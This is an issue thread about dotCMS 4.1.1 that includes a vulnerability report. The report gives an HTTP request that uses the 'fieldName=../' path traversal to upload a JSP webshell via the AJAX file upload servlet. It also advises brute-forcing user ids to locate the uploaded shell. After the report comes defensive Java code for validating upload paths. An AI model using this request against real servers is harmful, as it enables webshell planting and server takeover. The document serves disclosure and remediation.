/assets directory accessible via web request #12131
Comments
While this could be tighter, the /assets directory is a disallowed path in dotcms and no file can be served from that path unless it is circumvented: This means that
cannot be accessed via a web request. Please comment if this is incorrect.

@wezell I think you got something wrong! I just tested your demo site, show you my jsp file:

@kimiizhang thank you for proving me wrong! That path should not be allowed and we will take a look at it.

PR: #12134

Unable to reproduce in the last master... |

==========================
Author: M3@pandas From DBAppSecurity Security Lab
Affected Version: 4.1.1 the latest version
Vulnerable cgi:
/dotcms_4.1.1_999999.jar!/com/dotmarketing/servlets/AjaxFileUploadServlet.class:
tempUserFolder can be controlled through the parameter 'fieldName', the upload data is not filtered and the upload path can be user-defined, so an attacker with administrator authority can upload an evil jsp webshell file to control the whole web site or even the web server.
==========================
POC && EXP
Login as administrator
POST /servlets/ajax_file_upload?fieldName=../ HTTP/1.1
Host: 192.168.1.204:8080
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--------1234995635
Cookie: your own cookies
Connection: close
Content-Length: 138
----------1234995635
Content-Disposition: form-data; name="xxx"; filename="test.jsp"
<% out.print("test_for_fun!");%>
----------1234995635--
shell is : http://192.168.1.204:8080/assets/tmp_upload/test.jsp
Attention: In some other cases: 'fieldName=', then the shell will be in 'assets/tmp_upload/dotcms.org.1/' like this: http://192.168.1.204:8080/assets/tmp_upload/dotcms.org.1/test.jsp , 'dotcms.org.1' is your userid, even if you do not know your userid, you can bruteforce the number behind 'dotcms.org.'.
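The report above describes two weaknesses working together: the servlet builds its temp folder from the untrusted `fieldName` parameter (so `../` walks out of the intended folder), and the client-supplied filename `test.jsp` is written as-is into a directory that the web server will execute. The following is an added example of the defensive path handling a reviewer would expect in such an upload handler; it is illustrative code, not dotCMS's AjaxFileUploadServlet or its fix in PR #12134. The class name `UploadPathGuard`, the base directory, and the allowed extension list are assumptions made for the example.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.UUID;

/**
 * Added example (not dotCMS code): derive a per-request temp upload folder
 * from an untrusted fieldName and refuse anything that escapes the base.
 */
public class UploadPathGuard {

    private final Path baseDir;

    public UploadPathGuard(Path baseDir) {
        // Canonicalise once so later startsWith() checks compare like with like.
        this.baseDir = baseDir.toAbsolutePath().normalize();
    }

    /** Only a conservative identifier is accepted as a folder component (allow-list, not deny-list). */
    static boolean isSafeComponent(String s) {
        return s != null
                && s.matches("[A-Za-z0-9._-]{1,64}")   // no '/', '\\', '%', NUL, whitespace
                && !s.equals(".") && !s.equals("..");  // dot segments pass the regex, so reject explicitly
    }

    /**
     * Returns the resolved folder for fieldName, or throws if the input contains
     * path separators, dot segments, or normalizes outside baseDir.
     * An input such as "../" (as in the report) is rejected by the allow-list alone.
     */
    public Path resolveTempFolder(String fieldName) {
        if (!isSafeComponent(fieldName)) {
            throw new IllegalArgumentException("rejected fieldName: " + fieldName);
        }
        Path target = baseDir.resolve(fieldName).normalize();
        // Defence in depth: even an allow-listed component is re-checked for containment,
        // and the base directory itself is never used as the target.
        if (!target.startsWith(baseDir) || target.equals(baseDir)) {
            throw new IllegalArgumentException("path escapes upload base: " + fieldName);
        }
        return target;
    }

    /**
     * The client's filename never reaches the filesystem; only its extension is kept,
     * and that extension must be on an allow-list (assumed list for this example).
     */
    public Path resolveUploadFile(String fieldName, String originalFilename) {
        String ext = "";
        int dot = originalFilename == null ? -1 : originalFilename.lastIndexOf('.');
        if (dot >= 0) {
            ext = originalFilename.substring(dot + 1).toLowerCase();
        }
        if (!ext.matches("png|jpg|jpeg|gif|pdf")) {
            throw new IllegalArgumentException("disallowed upload type: " + ext);
        }
        String serverName = UUID.randomUUID() + "." + ext;
        return resolveTempFolder(fieldName).resolve(serverName);
    }

    public static void main(String[] args) {
        // Assumed base directory for the demonstration.
        UploadPathGuard guard = new UploadPathGuard(Paths.get("/var/dotcms/assets/tmp_upload"));
        String[] inputs = {"dotcms.org.1", "../", "..%2F", "a/b", "..", "fieldA"};
        for (String in : inputs) {
            try {
                System.out.println(in + " -> " + guard.resolveTempFolder(in));
            } catch (IllegalArgumentException e) {
                System.out.println(in + " -> rejected (" + e.getMessage() + ")");
            }
        }
        try {
            guard.resolveUploadFile("fieldA", "test.jsp");
        } catch (IllegalArgumentException e) {
            System.out.println("test.jsp -> rejected (" + e.getMessage() + ")");
        }
    }
}
```

Two design points follow from the thread. First, normalisation and `startsWith` alone are not sufficient: a strict allow-list on the component is the primary control and the containment check is the backstop. Second, the maintainer's observation that /assets should be a disallowed path is a separate layer; even with correct path handling, a temp upload directory should not be servable or executable by the application server, so a renamed, extension-checked file landing there causes no harm if the first layer is ever bypassed.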